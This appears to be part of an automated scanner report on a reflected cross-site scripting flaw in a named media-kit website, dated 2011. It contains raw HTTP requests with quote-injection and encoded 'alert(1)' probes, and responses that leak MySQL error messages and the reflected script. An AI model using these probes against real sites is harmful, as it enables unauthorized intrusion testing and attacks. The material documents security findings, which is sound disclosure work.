2. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.wsjmediakit |
Path: | /digital/ |
GET /digital'/ HTTP/1.1 Host: www.wsjmediakit.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application Referer: http://www.wsjdigital.com Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Tue, 04 Oct 2011 15:19:32 GMT Server: Apache/2.2.14 Content-Type: text/html Content-Length: 12726 <br /> <b>Warning</b>: mysql_num_rows(): supplied argument is not a valid MySQL result resource in <b>/usr/www/users/wsjmk <br /> <b ...[SNIP]... |
GET /digital''/ HTTP/1.1 Host: www.wsjmediakit.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application Referer: http://www.wsjdigital.com Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.0 404 Not Found Date: Tue, 04 Oct 2011 15:19:32 GMT Server: Apache/2.2.14 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <title>Page Not Found</title> <meta http-equiv="Content-type" conte ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.wsjmediakit |
Path: | /digital'/ |
GET /digital'32cb2%253balert%25281 Accept: text/xml,application/xml User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Cache-Control: no-cache Host: www.wsjmediakit.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Tue, 04 Oct 2011 15:26:46 GMT Server: Apache/2.2.14 Content-Type: text/html Content-Length: 12753 <br /> <b>Warning</b>: mysql_num_rows(): supplied argument is not a valid MySQL result resource in <b>/usr/www/users/wsjmk <br /> <b ...[SNIP]... <script type="text/javascript"> $(document).ready var s1 = 'digital'32cb2;alert(1)/ var s2 = ''; $('.sf-menu li a').each(function(){ if($(this).attr('href') == '/'+s1+'/'){ $(this).addClass('active' } }); $('#subnav tr td a').each(function(){ if($(this).att ...[SNIP]... |